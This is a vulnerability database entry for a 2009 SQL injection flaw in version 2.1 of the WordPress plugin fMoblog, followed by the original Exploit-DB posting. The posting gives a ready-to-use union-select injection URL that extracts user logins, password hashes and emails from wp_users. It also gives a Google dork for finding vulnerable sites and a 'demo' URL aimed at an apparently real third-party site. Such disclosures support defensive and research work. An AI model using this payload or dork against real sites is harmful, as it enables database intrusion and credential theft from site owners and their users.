Wordpress Plugin fMoblog Remote SQL Injection Vulnerability

vendor:

fmoblog

by:

strange kevin

8.5

CVSS

HIGH

SQL Injection

CWE

Product Name: fmoblog

Affected Version From: 2.1

Affected Version To: 2.1

Patch Exists: YES

Related CWE: N/A

CPE: a:fahlstad:fmoblog:2.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

WordPress Plugin fMoblog Remote SQL Injection Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'page_id' variable in the 'index.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation allows to read arbitrary data from the database, including passwords and other sensitive information.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update to the latest version of the plugin.

Source

Exploit-DB raw data:

#############################################################
# Wordpress Plugin fMoblog Remote SQL Injection Vulnerability
# Plugin Home: http://www.fahlstad.se/wp-plugins/fmoblog/
# Plugin Version: 2.1
# Author: strange kevin
# Email: strange.kevin@gmail.com
# Google Dork: "Gallery powered by fMoblog"
##############################################################

# Exploit: http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
# Demo: http://www.tarynitup.com/?page_id=20&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--

##############################################################
# Greetz: str0ke and milw0rm.com
##############################################################

# milw0rm.com [2009-03-17]